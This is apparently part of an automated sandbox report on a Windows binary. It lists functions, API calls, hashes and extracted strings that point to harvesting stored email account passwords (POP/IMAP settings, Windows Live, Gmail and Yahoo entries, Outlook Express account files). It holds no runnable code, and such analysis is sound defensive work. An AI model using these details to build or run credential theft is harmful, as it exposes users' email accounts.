                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040858C
                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 0040859D
                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085B4
                                                                                                      • Part of subcall function 00408572: ??3@YAXPAX@Z.MSVCRT ref: 004085BD
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00408793
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004087AF
                                                                                                    • memcpy.MSVCRT ref: 004087D7
                                                                                                    • memcpy.MSVCRT ref: 004087F4
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 0040887D
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00408887
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 004088BF
                                                                                                      • Part of subcall function 004078FF: LoadStringA.USER32(00000000,0000000D,?,?), ref: 004079C8
                                                                                                      • Part of subcall function 004078FF: memcpy.MSVCRT ref: 00407A07
                                                                                                      • Part of subcall function 004078FF: strcpy.MSVCRT(004172C0,strings,?,?,00408822,?,?,?,?,?,00000000,76020A60), ref: 0040797A
                                                                                                      • Part of subcall function 004078FF: strlen.MSVCRT ref: 00407998
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??2@??3@$memcpy$LoadStringstrcpystrlen
                                                                                                    • String ID: d$hA
                                                                                                    • API String ID: 3781940870-4030989184
                                                                                                    • Opcode ID: 749b03da6d6f19d0a5f257c80fb2895103226823e71af08a783c90a014a30ea1
                                                                                                    • Instruction ID: 2ee817cab8fb9d662dc1fdc17dcda2a390100e1008d8253a008a3d74f0a2914d
                                                                                                    • Opcode Fuzzy Hash: 749b03da6d6f19d0a5f257c80fb2895103226823e71af08a783c90a014a30ea1
                                                                                                    • Instruction Fuzzy Hash: 76518D72A01704AFDB24DF2AC582B9AB7E5FF48354F10852EE54ADB391EB74E940CB44
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040314D, Relevance: 13.6, APIs: 1, Strings: 8, Instructions: 100stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040311F: GetPrivateProfileStringA.KERNEL32(00000000,?,Function_00012466,?,?,?), ref: 00403143
                                                                                                    • strchr.MSVCRT ref: 00403262
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: PrivateProfileStringstrchr
                                                                                                    • String ID: 1$LoginName$PopAccount$PopServer$RealName$ReturnAddress$SavePasswordText$UsesIMAP
                                                                                                    • API String ID: 1348940319-1729847305
                                                                                                    • Opcode ID: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                                                    • Instruction ID: 1cfb9ddeec5dd782170234712f417fe000b4b626ad5f21becf6162a2306db812
                                                                                                    • Opcode Fuzzy Hash: cc26f5bc1b7aaf2e570deba64efa3e2944f8347bda1c61efbd6a62b24a137412
                                                                                                    • Instruction Fuzzy Hash: 7631B370A04209BEEF119F20CC06FD97F6CAF14318F10816AF95C7A1D2C7B95B958B54
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040F09D, Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 60COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcpy
                                                                                                    • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                    • API String ID: 3510742995-3273207271
                                                                                                    • Opcode ID: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                                                    • Instruction ID: 3259d816fa1e591736f6461b451ad75962e4f861ee845343ab42ffe8f3feec31
                                                                                                    • Opcode Fuzzy Hash: eb0853a178c78b5e5dae4962a3b0185fc54ec5424429a466571b96bdadbff949
                                                                                                    • Instruction Fuzzy Hash: 450171B2E852A4B5DA350905AC07FA70B865BA6B11F350037F58639AC2E1AD0D8F516F
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040D865, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 133COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00406278: GetVersionExA.KERNEL32(00417118,0000001A,0040EE77,00000104), ref: 00406292
                                                                                                    • memset.MSVCRT ref: 0040D917
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?), ref: 0040D92E
                                                                                                    • _strnicmp.MSVCRT ref: 0040D948
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D974
                                                                                                    • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,?,?,?,?,?), ref: 0040D994
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ByteCharMultiWide$Version_strnicmpmemset
                                                                                                    • String ID: WindowsLive:name=*$windowslive:name=
                                                                                                    • API String ID: 945165440-3589380929
                                                                                                    • Opcode ID: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                                                    • Instruction ID: 27d6d704735a973bd95cec350459a8e2137e61d4893fa240fc9d50cc053063f8
                                                                                                    • Opcode Fuzzy Hash: 3f9da4edc47d2955fd47475458a514ae76322f65be24e3d720485981fdfd18bc
                                                                                                    • Instruction Fuzzy Hash: FD4183B1904345AFC720EF54D9849ABBBECEB84344F044A3EF995A3291D734DD48CB66
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407FEB, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 62COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 00408011
                                                                                                    • GetDlgCtrlID.USER32(?), ref: 0040801C
                                                                                                    • GetWindowTextA.USER32(?,?,00001000), ref: 0040802F
                                                                                                    • memset.MSVCRT ref: 00408055
                                                                                                    • GetClassNameA.USER32(?,?,000000FF), ref: 00408068
                                                                                                    • _stricmp.MSVCRT(?,sysdatetimepick32), ref: 0040807A
                                                                                                      • Part of subcall function 00407EC3: _itoa.MSVCRT ref: 00407EE4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$ClassCtrlNameTextWindow_itoa_stricmp
                                                                                                    • String ID: sysdatetimepick32
                                                                                                    • API String ID: 896699463-4169760276
                                                                                                    • Opcode ID: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                                                                    • Instruction ID: 1a4d9fd07e56cfca2567f2ea4562d04845e15f14fd3b0b17285a92413f4c7fe9
                                                                                                    • Opcode Fuzzy Hash: 2e87e3ae20d77166e7272aa9ea6a9449553f890dc716fe518baf187b76836374
                                                                                                    • Instruction Fuzzy Hash: 8811E3728040187EDB119B64DC81DEB7BACEF58355F0440BBFB49E2151EA789FC88B69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405715, Relevance: 12.2, APIs: 8, Instructions: 196windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004057BD
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004057D0
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004057E5
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004057FD
                                                                                                    • EndDialog.USER32(?,00000002), ref: 00405819
                                                                                                    • EndDialog.USER32(?,00000001), ref: 0040582C
                                                                                                      • Part of subcall function 004054C6: GetDlgItem.USER32(?,000003E9), ref: 004054D4
                                                                                                      • Part of subcall function 004054C6: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 004054E9
                                                                                                      • Part of subcall function 004054C6: SendMessageA.USER32(?,00001032,00000000,00000000), ref: 00405505
                                                                                                    • SendDlgItemMessageA.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405844
                                                                                                    • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405950
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Item$DialogMessageSend
                                                                                                    • String ID:
                                                                                                    • API String ID: 2485852401-0
                                                                                                    • Opcode ID: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                                                                    • Instruction ID: 996ad43d7974a89766dbed28e3aed2d7518275209d6347d70af2c8e68d8db374
                                                                                                    • Opcode Fuzzy Hash: c39d939c89ad9df75a692a1ffb268d4e722a9ad13e3cbed9f2235f7ec5d84e36
                                                                                                    • Instruction Fuzzy Hash: 8361BE31600A05AFDB21AF25C986A2BB3A5EF40724F04C13EF915A76D1D778A960CF59
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00405960, Relevance: 12.1, APIs: 8, Instructions: 103windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 2313361498-0
                                                                                                    • Opcode ID: 3b59a34044821ae943e17cfdd0b39df9edf17ee05e09fb29303e280981c0752a
                                                                                                    • Instruction ID: c71b172428599a8aed3dd41af9edf36fe528ac6939486576e3287dd5c50b91d7
                                                                                                    • Opcode Fuzzy Hash: 3b59a34044821ae943e17cfdd0b39df9edf17ee05e09fb29303e280981c0752a
                                                                                                    • Instruction Fuzzy Hash: 9931C6B2600605BFDB149F29D88591AF7A5FF44354B10863FF54AE72A0DB78EC408F98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004037B1, Relevance: 12.1, APIs: 7, Strings: 1, Instructions: 86stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004037D2
                                                                                                    • memset.MSVCRT ref: 004037E6
                                                                                                      • Part of subcall function 00410F79: memset.MSVCRT ref: 00410F9B
                                                                                                      • Part of subcall function 00410F79: RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,000003FF), ref: 00411007
                                                                                                      • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                      • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                                    • strchr.MSVCRT ref: 00403855
                                                                                                    • strcpy.MSVCRT(?,?,?,?,?), ref: 00403872
                                                                                                    • strlen.MSVCRT ref: 0040387E
                                                                                                    • sprintf.MSVCRT ref: 0040389E
                                                                                                    • strcpy.MSVCRT(?,?,?,?,?), ref: 004038B4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memset$strcpystrlen$Closememcpysprintfstrchr
                                                                                                    • String ID: %s@yahoo.com
                                                                                                    • API String ID: 1649821605-3288273942
                                                                                                    • Opcode ID: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                                                                    • Instruction ID: 59c64947ec9ad5e5fa7ad27033647646f0aae9e06f6053b7dc62ef58ab254070
                                                                                                    • Opcode Fuzzy Hash: d756cc4bb234ca8bd2adb7c792dfa1259f1477984d05252a8ea6bc4bb60e6678
                                                                                                    • Instruction Fuzzy Hash: 592184B3D0412C6EDB21EB55DD41FDA77AC9F85308F0404EBB64DE6041E6B8AB848BA5
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040A698, Relevance: 12.1, APIs: 8, Instructions: 76COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetClientRect.USER32(?,?), ref: 0040A6B7
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040A6CD
                                                                                                    • GetWindowRect.USER32(?,?), ref: 0040A6E0
                                                                                                    • BeginDeferWindowPos.USER32(00000003), ref: 0040A6FD
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 0040A71A
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 0040A73A
                                                                                                    • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000004), ref: 0040A761
                                                                                                    • EndDeferWindowPos.USER32(?), ref: 0040A76A
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: Window$Defer$Rect$BeginClient
                                                                                                    • String ID:
                                                                                                    • API String ID: 2126104762-0
                                                                                                    • Opcode ID: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                                                    • Instruction ID: 87e3885615821b4149b7d1c90d618f2f4546f2004ccbdac015d6c62594ca92fd
                                                                                                    • Opcode Fuzzy Hash: 7346dcf7e22bd518b4d0e96dfafb7fac3e60ecb16f258d456982d784f7109538
                                                                                                    • Instruction Fuzzy Hash: 1E21A771A00209FFDB11CFA8DE89FEEBBB9FB08710F104465F655E2160C771AA519B24
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406069, Relevance: 12.0, APIs: 8, Instructions: 42clipboardmemorystringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • EmptyClipboard.USER32 ref: 00406071
                                                                                                    • strlen.MSVCRT ref: 0040607E
                                                                                                    • GlobalAlloc.KERNEL32(00002000,00000001,?,?,?,?,0040AEA7,?), ref: 0040608D
                                                                                                    • GlobalLock.KERNEL32(00000000,?,?,?,?,0040AEA7,?), ref: 0040609A
                                                                                                    • memcpy.MSVCRT ref: 004060A3
                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 004060AC
                                                                                                    • SetClipboardData.USER32(00000001,00000000), ref: 004060B5
                                                                                                    • CloseClipboard.USER32 ref: 004060C5
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ClipboardGlobal$AllocCloseDataEmptyLockUnlockmemcpystrlen
                                                                                                    • String ID:
                                                                                                    • API String ID: 3116012682-0
                                                                                                    • Opcode ID: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                                                    • Instruction ID: 7816216ade6a299d8ea944e6e9fe2aa84d769726faeb140b6a28ec5125b6acba
                                                                                                    • Opcode Fuzzy Hash: e5bd8c8a43ca7d2c4db01fa4e1da57243b9996234b951f9bb1286513fb8d9efd
                                                                                                    • Instruction Fuzzy Hash: 0DF0B4375402296BC3102BA0AD4CEDB7B6CEBC8B557028139FB0AD3151EA78592487B9
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040C530, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 145COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcpymemset$strlen$_memicmp
                                                                                                    • String ID: user_pref("
                                                                                                    • API String ID: 765841271-2487180061
                                                                                                    • Opcode ID: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                                                    • Instruction ID: b5bbfaa39c0e48752cfa6ff41fc25d90fc637c7d31dd27b270ce5155e9a91379
                                                                                                    • Opcode Fuzzy Hash: 982af1ce4df36f9e7f27790100b248c040b5dee6bd91ee0204a86cb4ecdb3b86
                                                                                                    • Instruction Fuzzy Hash: A74168B2904118AADB10DB95DCC0EDA77AD9F44314F1046BBE605F7181EA389F49CFA8
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040559F, Relevance: 10.6, APIs: 7, Instructions: 126windowCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004055B6
                                                                                                    • SendMessageA.USER32(00000000,00001009,00000000,00000000), ref: 004055CF
                                                                                                    • SendMessageA.USER32(?,00001036,00000000,00000026), ref: 004055DC
                                                                                                    • SendMessageA.USER32(?,0000101C,00000000,00000000), ref: 004055E8
                                                                                                    • memset.MSVCRT ref: 00405652
                                                                                                    • SendMessageA.USER32(?,00001019,?,?), ref: 00405683
                                                                                                    • SetFocus.USER32(?), ref: 00405708
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: MessageSend$FocusItemmemset
                                                                                                    • String ID:
                                                                                                    • API String ID: 4281309102-0
                                                                                                    • Opcode ID: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                                                    • Instruction ID: c9ec69d2b7f122f2474fbd4df523f5fea2365e5f162f49a3354b930d279265bd
                                                                                                    • Opcode Fuzzy Hash: 373d2b268ded57f609baf290f43656ad992e230c838bd3448275ee254fe81e2e
                                                                                                    • Instruction Fuzzy Hash: 304126B5D00109AFDB209F99DC81DAEBBB9FF04348F00846AE918B7291D7759E50CFA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00407EFB, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 77windowstringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: ItemMenu$CountInfomemsetstrchr
                                                                                                    • String ID: 0$6
                                                                                                    • API String ID: 2300387033-3849865405
                                                                                                    • Opcode ID: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                                                    • Instruction ID: e6a74f55cf859b5146a282672b091174d688b167a10cd96a0b5acbf0203f559b
                                                                                                    • Opcode Fuzzy Hash: d1119da1829f27f5b6955e53606e2fca4aef30ff8dacb709f4e7d2ab8ff52e08
                                                                                                    • Instruction Fuzzy Hash: B821917190C381AFD7109F21D88199BBBE8FB84348F44897FF68496290E779E944CB5B
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004044DA, Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 75COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 004060D0: strlen.MSVCRT ref: 004060D5
                                                                                                      • Part of subcall function 004060D0: memcpy.MSVCRT ref: 004060EA
                                                                                                    • _stricmp.MSVCRT(?,pop3,?,?,?,?,?), ref: 0040456B
                                                                                                    • _stricmp.MSVCRT(?,imap), ref: 00404589
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: _stricmp$memcpystrlen
                                                                                                    • String ID: imap$pop3$smtp
                                                                                                    • API String ID: 445763297-821077329
                                                                                                    • Opcode ID: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                                                    • Instruction ID: 85134e65636b23d23915c58aa006eeb0f313b09a76600224a93e2cbe40a0dcf5
                                                                                                    • Opcode Fuzzy Hash: e0dbfd60aaecd0c77e478752a73cf595843bbe096482dfa5d8f178f066783ef1
                                                                                                    • Instruction Fuzzy Hash: 8F2174B2500318ABC711DB61CD41BDBB3FDAF50314F10056BE64AB3181DBB87B858B9A
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004036CC, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 67stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                                                      • Part of subcall function 0040E906: UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                                                      • Part of subcall function 0040E906: memcpy.MSVCRT ref: 0040E966
                                                                                                      • Part of subcall function 0040E906: CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                                                    • strchr.MSVCRT ref: 00403706
                                                                                                    • strcpy.MSVCRT(?,00000001,?,?,?), ref: 0040372F
                                                                                                    • strcpy.MSVCRT(?,?,?,00000001,?,?,?), ref: 0040373F
                                                                                                    • strlen.MSVCRT ref: 0040375F
                                                                                                    • sprintf.MSVCRT ref: 00403783
                                                                                                    • strcpy.MSVCRT(?,?), ref: 00403799
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: strcpy$FromStringUuid$FreeTaskmemcpysprintfstrchrstrlen
                                                                                                    • String ID: %s@gmail.com
                                                                                                    • API String ID: 2649369358-4097000612
                                                                                                    • Opcode ID: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                                                    • Instruction ID: 7e171057c748ab9e8bd63aa8a265ef6dac548e8f33c4ed25ddb9a168741e2a8b
                                                                                                    • Opcode Fuzzy Hash: 54903d80b682238d7ebfd218583c1774319c6b1be4d607b0d7699df45f23e7c9
                                                                                                    • Instruction Fuzzy Hash: B221ABF294411C6EDB11DB55DC85FDA77ACAB54308F4004BBE609E2081EA789BC48B69
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040684D, Relevance: 10.6, APIs: 6, Strings: 1, Instructions: 62stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: memcpystrlen$memsetsprintf
                                                                                                    • String ID: %s (%s)
                                                                                                    • API String ID: 3756086014-1363028141
                                                                                                    • Opcode ID: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                                                    • Instruction ID: 70c58cdfc2d4abbd805528426562f63df61edbbac87544aa2a0c8fc412f19922
                                                                                                    • Opcode Fuzzy Hash: 2fac32cc3f4e238a8d54a0630ee4b758ae70e84b84dd66d59e7312a43b943eb6
                                                                                                    • Instruction Fuzzy Hash: 371193B2800158BFDF21DF58CC44BD9BBEDEF41308F00856AEA49EB112D674EA55CB98
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0040E906, Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 54COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • UuidFromStringA.RPCRT4(5e7e8100-9138-11d1-945a-00c04fc308ff,?), ref: 0040E91D
                                                                                                    • UuidFromStringA.RPCRT4(00000000-0000-0000-0000-000000000000,?), ref: 0040E92A
                                                                                                    • memcpy.MSVCRT ref: 0040E966
                                                                                                    • CoTaskMemFree.OLE32(?,?), ref: 0040E975
                                                                                                    Strings
                                                                                                    • 5e7e8100-9138-11d1-945a-00c04fc308ff, xrefs: 0040E918
                                                                                                    • 00000000-0000-0000-0000-000000000000, xrefs: 0040E925
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: FromStringUuid$FreeTaskmemcpy
                                                                                                    • String ID: 00000000-0000-0000-0000-000000000000$5e7e8100-9138-11d1-945a-00c04fc308ff
                                                                                                    • API String ID: 1640410171-3316789007
                                                                                                    • Opcode ID: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                                                    • Instruction ID: cd3b670b1268c91d98ef63b10095ff511f923cb8a4afa2e2ee491a09b7572d99
                                                                                                    • Opcode Fuzzy Hash: f3252fd9cfa063382862d0ae5d3914fc22746c740fb9b30eff228657135c0efe
                                                                                                    • Instruction Fuzzy Hash: AD01ADB350011CBADF01ABA6CD40DEB7BACAF08354F004833FD45E6150E634EA198BA4
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410BC7, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 51COMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                      • Part of subcall function 00405ECB: CreateFileA.KERNEL32(00410C96,80000000,00000001,00000000,00000003,00000000,00000000,00410BD2,?,rA,00410C96,?,?,*.oeaccount,rA,?), ref: 00405EDD
                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,00000000,rA,00410C96,?,?,*.oeaccount,rA,?,00000104), ref: 00410BE1
                                                                                                    • ??2@YAPAXI@Z.MSVCRT ref: 00410BF3
                                                                                                    • SetFilePointer.KERNEL32(00000000,00000002,00000000,00000000,?), ref: 00410C02
                                                                                                      • Part of subcall function 004066F6: ReadFile.KERNEL32(00000000,?,00410C15,00000000,00000000,?,?,00410C15,?,00000000), ref: 0040670D
                                                                                                      • Part of subcall function 00410A8A: wcslen.MSVCRT ref: 00410A9D
                                                                                                      • Part of subcall function 00410A8A: ??2@YAPAXI@Z.MSVCRT ref: 00410AA6
                                                                                                      • Part of subcall function 00410A8A: WideCharToMultiByte.KERNEL32(00000000,00000000,00410C2C,000000FF,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,00410C2C,?,00000000), ref: 00410ABF
                                                                                                      • Part of subcall function 00410A8A: strlen.MSVCRT ref: 00410B02
                                                                                                      • Part of subcall function 00410A8A: memcpy.MSVCRT ref: 00410B1C
                                                                                                      • Part of subcall function 00410A8A: ??3@YAXPAX@Z.MSVCRT ref: 00410BAF
                                                                                                    • ??3@YAXPAX@Z.MSVCRT ref: 00410C2D
                                                                                                    • CloseHandle.KERNEL32(?), ref: 00410C37
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000010.00000002.81131698230.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$??2@??3@$ByteCharCloseCreateHandleMultiPointerReadSizeWidememcpystrlenwcslen
                                                                                                    • String ID: rA
                                                                                                    • API String ID: 1886237854-474049127
                                                                                                    • Opcode ID: 9e48d39971a6ac14c436bebd2197ba5f67881960bddc32902098c3bd3f62a139
                                                                                                    • Instruction ID: e5b0438d6bc675850ae5605026c1b4582ede65e06839efbb6018c27a8e90e269
                                                                                                    • Opcode Fuzzy Hash: 9e48d39971a6ac14c436bebd2197ba5f67881960bddc32902098c3bd3f62a139
                                                                                                    • Instruction Fuzzy Hash: 4E01B532400248BEDB206B75EC4ECDB7B6CEF55364B10812BF91486261EA758D54CB68
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 004034CB, Relevance: 10.5, APIs: 4, Strings: 3, Instructions: 47stringCOMMON
                                                                                                    Download Yara Rule
                                                                                                    APIs
                                                                                                    • memset.MSVCRT ref: 004034EB
                                                                                                    • memset.MSVCRT ref: 00403501
                                                                                                      • Part of subcall function 0040EBC1: RegCloseKey.ADVAPI32(000003FF,?,?,?,?,00000000,000003FF), ref: 0040EBFA
                                                                                                    • strcpy.MSVCRT(00000000,00000000), ref: 0040353C
                                                                                                      • Part of subcall function 00405F1F: strlen.MSVCRT ref: 00405F20
